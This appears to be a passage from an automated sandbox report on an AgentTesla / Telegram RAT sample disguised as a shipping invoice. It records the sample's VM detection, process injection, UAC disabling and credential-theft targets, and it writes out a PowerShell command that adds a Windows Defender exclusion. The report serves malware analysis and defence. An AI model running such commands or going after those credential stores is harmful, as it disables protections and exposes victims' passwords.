                      Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: AddInProcess32.exe, 00000004.00000002.2468385307.0000000005E00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: hgfsZrw6
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.8.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
                      Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330707407.0000019865630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      .NET source code references suspicious native API functions
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, NativeMethods.csReference to suspicious API methods: xVirtualProtect(address, size, newProtect, out oldProtect)
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, NativeMethods.csReference to suspicious API methods: xLoadLibrary(libraryName)
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, NativeMethods.csReference to suspicious API methods: xGetProcAddress(moduleHandle, procName)
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, moEk.csReference to suspicious API methods: EYAPsVT.OpenProcess(CgGfQLvbm.DuplicateHandle, bInheritHandle: true, (uint)_2y5.ProcessID)
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -ForceJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A2F008Jump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeQueries volume information: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Disables UAC (registry)
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                      Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2464175604.0000000002C3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2464175604.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: COMMERCIAL INVOICE - BL - AWB 7032805642.exe PID: 3648, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7204, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: COMMERCIAL INVOICE - BL - AWB 7032805642.exe PID: 3648, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7204, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: COMMERCIAL INVOICE - BL - AWB 7032805642.exe PID: 3648, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7204, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2464175604.0000000002C3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2464175604.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: COMMERCIAL INVOICE - BL - AWB 7032805642.exe PID: 3648, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7204, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: COMMERCIAL INVOICE - BL - AWB 7032805642.exe PID: 3648, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7204, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		211
                      Process Injection                      		21
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		231
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API                      		Boot or Logon Initialization Scripts1
                      DLL Side-Loading                      		151
                      Virtualization/Sandbox Evasion                      		1
                      Input Capture                      		1
                      Process Discovery                      		Remote Desktop Protocol1
                      Input Capture                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
                      Process Injection                      		1
                      Credentials in Registry                      		151
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares11
                      Archive Collected Data                      		2
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Deobfuscate/Decode Files or Information                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object Model2
                      Data from Local System                      		3
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Obfuscated Files or Information                      		LSA Secrets1
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Timestomp                      		Cached Domain Credentials24
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
